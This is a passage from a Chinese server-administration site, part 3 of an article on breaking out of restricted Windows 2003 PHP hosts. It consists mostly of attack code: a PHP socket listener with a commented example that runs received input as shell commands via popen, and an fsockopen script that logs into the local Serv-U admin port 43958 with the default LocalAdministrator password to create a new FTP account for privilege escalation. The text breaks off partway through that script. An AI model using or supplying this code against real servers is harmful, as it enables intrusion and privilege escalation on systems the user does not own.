当前位置 主页 > 服务器问题 > win服务器问题汇总 >

最大化 缩小

    win2003 PHP服务器的突破新思路(3)

    栏目:win服务器问题汇总 时间:2019-10-11 14:27


      }
      if (($ret = socket_bind($sock, $address, $port)) < 0) {
      echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
      }
      if (($ret = socket_listen($sock, 5)) < 0) {
      echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
      }
      do {
      if (($msgsock = socket_accept($sock)) < 0) {
      echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
      break;
      }
      /* Send instructions. */
      $msg = "\nWelcome to the PHP Test Server. \n" .
      "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";
      socket_write($msgsock, $msg, strlen($msg));
      do {
      if (false === socket_recv($msgsock, $buf , 1024, 0)) {
      echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";
      break 2;
      }
      if (!$buf = trim($buf)) {
      continue;
      }
      if ($buf == 'quit') {
      break;
      }
      if ($buf == 'shutdown') {
      socket_close($msgsock);
      break 2;
      }
      $talkback = "PHP: You said '$buf'.\n";
      socket_write($msgsock, $talkback, strlen($talkback));
      echo "$buf\n";
      //以下处理接受到的buf
      /*eg:例如
      $buf=”cmd.exe /c netstat –an”;
      $pp = popen('$buf ', 'r');
      While($read = fgets($pp, 2096))
      echo $read;
      pclose($pp);
      */
      } while (true);
      socket_close($msgsock);
      } while (true);
      socket_close($sock);
      ?>
      事实上,很多主机都是没有加载php_sockets.dll的,庆幸的是,不需要socket模块支持的“fsockopen”函数已经足够我们使用了。因为只要有“fsockopen”,我们便可以自由地读写本机中未对外部开放的端口。使用fsockopen读写serv-u 的本地管理端口43958 (注: 该端口无法在外部连结) 进行提权便是一个很典型的例子:
      $adminuser=” LocalAdministrator”;
      $adminpass=” #l@$ak#.lk;0@P”;
      $adminport=” 43958”;
      $fp = fsockopen ("127.0.0.1",$adminport,$errno, $errstr, 8);
      if (!$fp) {
      echo "$errstr ($errno)
      \n";
      } else {
      //可以写入$shellcode
      // fputs ($fp, $shellcode);
      fputs ($fp, "USER ".$adminuser."\r\n");
      sleep (1);
      fputs ($fp, "PASS ".$adminpass."\r\n");
      sleep (1);
      fputs ($fp, "SITE MAINTENANCE\r\n");
      sleep (1);
      fputs ($fp, "-SETUSERSETUP\r\n");
      fputs ($fp, "-IP=".$addr."\r\n");
      fputs ($fp, "-PortNo=".$ftpport."\r\n");
      fputs ($fp, "-User=".$user."\r\n");
      fputs ($fp, "-Password=".$password."\r\n");
      fputs ($fp, "-HomeDir=".$homedir."\r\n");
      fputs ($fp, "-LoginMesFile=\r\n");
      fputs ($fp, "-Disable=0\r\n");
      fputs ($fp, "-RelPaths=0\r\n");
      fputs ($fp, "-NeedSecure=0\r\n");
      fputs ($fp, "-HideHidden=0\r\n");
      fputs ($fp, "-AlwaysAllowLogin=0\r\n");
      fputs ($fp, "-ChangePassword=1\r\n");
      fputs ($fp, "-QuotaEnable=0\r\n");
      fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n");
    上一篇:启用windows默认的防火墙需要注意的地方
    下一篇:Windows Server 2008 R2忘记管理员密码后的解决方法